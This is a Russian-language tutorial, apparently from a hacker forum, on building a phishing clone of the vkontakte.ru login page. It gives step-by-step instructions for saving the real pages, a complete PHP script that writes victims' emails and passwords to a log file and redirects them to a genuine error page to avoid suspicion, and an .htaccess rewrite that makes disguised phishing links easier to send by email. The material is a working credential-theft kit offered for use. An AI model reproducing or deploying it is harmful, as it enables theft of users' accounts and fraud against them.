Делаем свой фейк
Итак, первое что нам нужно, так это выбрать жертворесурс и
собрать всю нужную нам инфу,а нам нужна толька копия некоторых страниц.Идем на
vkontakte.ru через Operu (!). Жмём кнопочку вход, попадаем на login.php, ее и возьмем за индекс нашего фейка. Жмем в опере: Фаил-->Сохранить
как-->В открывшимся диалоге под названием выбираем (по умолчанию там стоит
Веб Архив....) "HTML Фаил с изображениями", и обезательно графу Имя
Файла пишем index(или login.htm - в зависимости от страницы)
Далее вводим туда нереальные данные и попадаем на страницу,
на которой написано
Сохраняем ее точно так же, только вместо index пишем bad.
Далее вбиваем в Google.ru фразу Vkontakte.ru, жмем
Дополнительные результаты с vkontakte.ru » и ищим что-то связанное с эрором
контакта... На вторйо страницы я нашел VKontakte | Error
(http://vkontakte.ru/blank.php?code=10)- запоминаем,нам понадобиться эта ссылка
Усе, все что нам надо для фейка от ресурса, у нас уже есть.
[CoDiNg]
Такс, теперь иследуем форму логина. Открываем наш index.html
и ищем форму входа.
Код:
<form
method="post" name="login" id="login"
action="login.php">
<input
type="hidden" name="success_url" id="success_url"
value="">
<input
type="hidden" name="fail_url" id="fail_url"
value="">
<input
type="hidden" name="try_to_login"
id="try_to_login" value="1">
<table align="center"
cellpadding=0 cellspacing=7 border=0 width="40%">
<tr>
<td
width="100px">
<span
class="grey">Email:</span>
</td>
<td>
<input
class="inputText" type="text" name="email"
value="" id="email" size="25" />
<td>
</tr>
<tr>
<td>
<span
class="grey">Пароль:</span>
</td>
<td>
<input
class="inputText" type="password" name="pass"
value="" id="pass" size="25" />
</td>
</tr>
<tr>
<td>
</td>
<td>
<input
style="margin-top:1px; vertical-align: middle;"
type="checkbox" name="expire" id="expire"
value="1" /><small>Чужой компьютер</small>
</td>
</tr>
<tr>
<td>
</td>
<td>
Отсюда запоминаем 3 вещи:
1)
Код:
<form
method="post" name="login" id="login"
action="login.php">
2)
Код:
<input
class="inputText" type="text" name="email"
value="" id="email" size="25" />
3)
Код:
<input
class="inputText" type="password" name="pass"
value="" id="pass" size="25" />
Именно в этих 3 вещах заключаеться первая часть
уникальности, на любой социалке или эмайле или еще где либо, везде форма
входа(поля), будут в таком види (ну только название полей будит отличаться),к
примеру у однокласников это
Код:
<input
id="field_password" value="" style="width:
170px;" type="password" size="20"
name="st.password">
Тоесть просто отличаеться название полей, элементами дизайна,
но функция у всех одна и таже.
Теперь мы создаем php файл, и называем его к примеру login.php, его содержимое:
PHP код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i",
$_POST['email'])&& !empty($_POST['password'])){
fputs($f,
$_POST['email'].";".$_POST['password']." \n");
header("Location:
http://");
} else {
header("Location:
http://");
}
flock($f,3);
fclose($f);
?>
Собственно смотрим на скрипт, пару строчег, но это вполне
нормальный фейк, его функционал:
Сохранение передаваемых переменных, их проверка, редирект в
зависимости от проверки.
Итак, теперь возвращаемся к тем 3 строчкам:
1)
Код:
<form
method="post" name="login" id="login"
action="login.php">
тут у нас все в порядке, имя нашего скрипта совпадает с
именем их, но бывает что и не совпадет, тогда заменяем его или же переименовываем
наш.
2)
Код:
<input
class="inputText" type="text" name="email"
value="" id="email" size="25" />
Код:
<input
class="inputText" type="password" name="pass"
value="" id="pass" size="25" />
Отсюда нам нужно name="email" и
name="pass"
Вставляем их в наш скрипт в нужное место
PHP код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i",
$_POST['email'])&& !empty($_POST['pass'])){
fputs($f,
$_POST['email'].";".$_POST['pass']." \n");
header("Location:
http://");
} else {
header("Location:
http://");
}
flock($f,3);
fclose($f);
?>
Кто не заметил, это $_POST['email'] и $_POST['pass']
Далее смотрим скрип, тут стоит функция IF ELSE, и прегматч,
то есть если поле эмайл соотвествует эмайлу(ника@мыло.ру, а не как водят
ывпмдвгк), и поле пароль не пустое, то выполняется первый редирект, если же эмайл
не соответствует или поле пасс пустое, то на второй редирект. Из этого
следует,что если челл ввел мыло и что-то похожее на пасс, то кидаем его на
страницу с эрором http://vkontakte.ru/blank.php?code=10, а если ввел фигню (вот
тут нам и понадобилась копия страницы bad.html?когда мы вводили неверные
данные), то кидаем его обратно, тоесть вписываем bad.htm.
Выглядит это так:
PHP код:
<?php
/*
#############
#by_NoNameZ#
###########
*/
$f=fopen("log.txt","at");
flock($f,2);
if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i",
$_POST['email'])&& !empty($_POST['pass'])){
fputs($f,
$_POST['email'].";".$_POST['pass']." \n");
header("Location:
http://vkontakte.ru/blank.php?code=10");
} else {
header("Location:
bad.htm");
}
flock($f,3);
fclose($f);
?>
Сохраняем. Заливаем всю лабуду на сервер(login.php,index.htm+папка с файлами,bad.htm+папка с файлами),создаем фаил log.txt(советую свое уникальное имя придумать.
не забудьте в скрипте сменить), ставим на него chmod777.
3) небольшой апдейт...
Этот апдейт подойдет очень для СИ, в корне на ftp создаем фаил .htaccess со
следующим содержанием:
Код:
RewriteEngine
On
RewriteCond
%{REQUEST_FILENAME} !-f
RewriteCond
%{REQUEST_URI} !index\.htm
RewriteRule
(.*) index.htm? [QSA]
ВНИМАНИЕ!
!index\.htm - на этот фаил ссылается редирект, если же у вас
фейк допустим login.html то соответственно вам нужно переиминовать индекс в
логин.
Такс, данный фаил нам дает ссылку более качественно газлива,
а именно:
Ваш фейк.ру/любой текст, тобишь зная ссылку структуру создаваемого
фейка, к примеру контакта, мы можем сделать так:
и впарить это по мылу)))согласитесь. менее заметен теперь
фейк))
Вот и все
|